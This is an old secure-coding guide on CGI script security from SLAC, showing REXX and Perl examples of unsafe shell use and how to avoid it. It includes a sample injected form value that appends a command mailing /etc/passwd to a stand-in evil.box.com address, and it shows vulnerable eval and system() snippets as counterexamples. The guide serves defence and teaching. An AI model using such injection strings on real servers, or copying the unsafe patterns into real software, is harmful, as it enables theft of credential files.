Any time that a program such as a WWW server is interacting with a networked client such as a WWW browser, there is the possibility of that client attacking the program to gain unauthorized access. Even the most innocent looking script can be very dangerous to the integrity of your system.
With that in mind, I would like to present a few guidelines to help ensure your program does not come under attack. This presentation uses example from REXX and Perl, however, the principles apply to most languages.
You may also want to look at
Paul Phillips' CGI Security
for information
on Perl, C and C++. Another source of information is
Lincoln Stein's well-regarded WWW Security FAQ
Also if you are using
Perl then you should also consider using
Perl's taint checking mechanism.
Languages like REXX, the Bourne shell and Perl provide an Interpret command or equivalent (e.g. eval in the Bourne shell) which allow you to construct a string and have the interpreter execute that string. This can be very dangerous. For example, observe the following statements in a REXX script:
INTERPRET TRANSLATE(GETENV('QUERY_STRING'),' ','+')
or
ADDESS UNIX TRANSLATE(GETENV('QUERY_STRING'),' ','+'))
These clever little snippets take the query string, and convert it into a command to be executed by the Web server. Unfortunately, the user could very easily have put a command to delete all the files in the query string or to mail a copy of the password file to someone. So I must restrict what command(s) the system is allowed to execute in response to the input.
If a set of commands needs to be executed you may wish to set up a table containing the acceptable commands, see below for more on this.
A well-behaved client will escape any characters which have special meaning to the Bourne shell in a query string. For example it may replace special characters such as a semicolon (;) or a greater-than sign (>) with "%XX" where XX is the ASCII code for the character in hexadecimal. This helps to avoid problems with your script misinterpreting the characters when they are used to construct the arguments of a command to be executed (for example, via the REXX ADDRESS UNIX command or the Perl system() command) in the server's environment (for example the Bourne shell in Unix).
A mischevious client
may use special characters to confuse your
script and gain unauthorized access.
For example the following
line may be present in a form-mail program:
system("/usr/lib/sendmail -t $form_address < $input_file");
The problem is that system starts a subshell; however, there
is no guarantee that the $form_address variable
cannot be maniplulated by a mischevious client.
Consider the following value
for $form_address:
"legit-id@good.box.com;mail wily-cracker@evil.box.com < /etc/passwd"
In this case the wily-cracker has used the semicolon to append a command
to mail to herself the system's password file.
The CGI script should therefore be careful to accept only the subset of characters which will not confuse your script. A reasonable subset is [0-9] [a-z] [A-Z] -_./@ Any other characters should be treated with care and be rejected in general. The same goes for escaped characters after they have been converted. You may wish review the following REXX or Perl code fragments to see how the how to verify that a string contains only acceptable characters.
The general rule is that you should not fork a subshell if the CGI script is passing untrusted data to it. In Perl you can fork subshells with the system command, commands with backticks (for example `program $args`;), the exec statement (for example exec("program $args");), and by opening a pipe (for example open(OUT, "|program $prog-args");). In REXX the usual way to fork a subshell is to use the ADDRESS UNIX or POPEN commands. So you must not pass untrusted data to the shell and in programs that run externally with arguments, check the arguments to ensure they do not contain metacharacters.
It appears to be possible to avoid UNIX Bourne shell metacharacter
expansions (such as
piping (|), commands in backticks (`),
redirection (>, >>, <, etc.), multiple
commands (;), or filename expansions (using *, ?, [], etc.))
by placing the parameters for the UNIX command into
environment variables. For example in Uni-REXX you could replace
ADDRESS UNIX 'finger' username
by
Fail=PUTENV("PARM1="username);
ADDRESS UNIX 'finger "$PARM1"'
Note that we have not exhaustively tested this on multiple platforms,
and there may be some hacks that will defeat this protection.
Some versions of REXX (including Uni-REXX) also allow you to
avoid shell expansions by using
ADDRESS COMMAND 'finger' username
instead of
ADDRESS UNIX 'finger' username.
If the above mechanisms are not available then be sure to place backslashes before any characters that have special meaning to the Bourne shell before calling the program. This can be achieved easily with a short C function. See the sample REXX and Perl code fragments for how to accomplish this.
It is good practice to allow execution of only a very limited set of commands by the CGI script. This set might be selected from a table of allowed commands. See the REXX example for how this might be accomplished. This mechanism is utilized in SLAC's CGI Security Wrapper.
If your server is unfortunate enough to support server-side includes, turn them off for your script directories!!!. The server-side includes can be abused by clients which prey on scripts which directly output things they have been sent.
Be careful to ensure that any file contents that you display are appropriate. For example, if the script receives a request from a form or a URL to display part or all of a particular file, the script should first verify (e.g. versus a list or the httpd configuration file) that this file is appropriate to make visible via WWW.
Avoid allowing the client to access files higher up the directory
chain by blocking the use of .. in the filename.
Avoid the server misinterpreting a filename for options (which might result in the process hanging awaiting standard input since no filename is found) by checking that the filename does not start with a minus sign (-).
The IP address of the client is available to the CGI script in the environment variable REMOTE_ADDR. This may be used by the script to refuse the request if the client's IP address does not match some requirements.
It is very easy for an untested script to cause the server problems.
For example if, by mistake, the script asks for input from the console
e.g. by executing a REXX PULL
command with nothing on
the stack, or by executing
a REXX TRACE ?R
command. This will cause the process on
the server to stall.
Or the script may go into an
infinite loop, or continuously spawn new processes and use up all the
server's process slots.
You may test the script in Unix without requiring it to be executed
by the WWW server, by using the Unix
setenv
command to
set the environment variables required, then call your script and pipe
the output to a file. Then use your WWW browser to view the local
file created by the pipe.
At SLAC we have also set up a test WWW server at http://www.slac.stanford.edu:5080/ which should be used for testing CGI scripts on before they are put on the production server.
If possible set the access control to the script so it is executable by your WWW server, but not world readable. For example:
Also remember to delete any old/backup copies that may be
created automatically by an editor such as emacs, and which may still be
visible and executable by the server. One way to avoid the creation of
backup copies in the directory that the server will execute from,
is to keep and edit the actual script
in another directory and place a symbolic link to the script in the
directory the server will execute the script from.
This page evolved from information from Rob McCool robm@ncsa.uiuc.edu. Also I have gained many insights and useful information from John Halperin@slac.stanford.edu.
Les Cottrell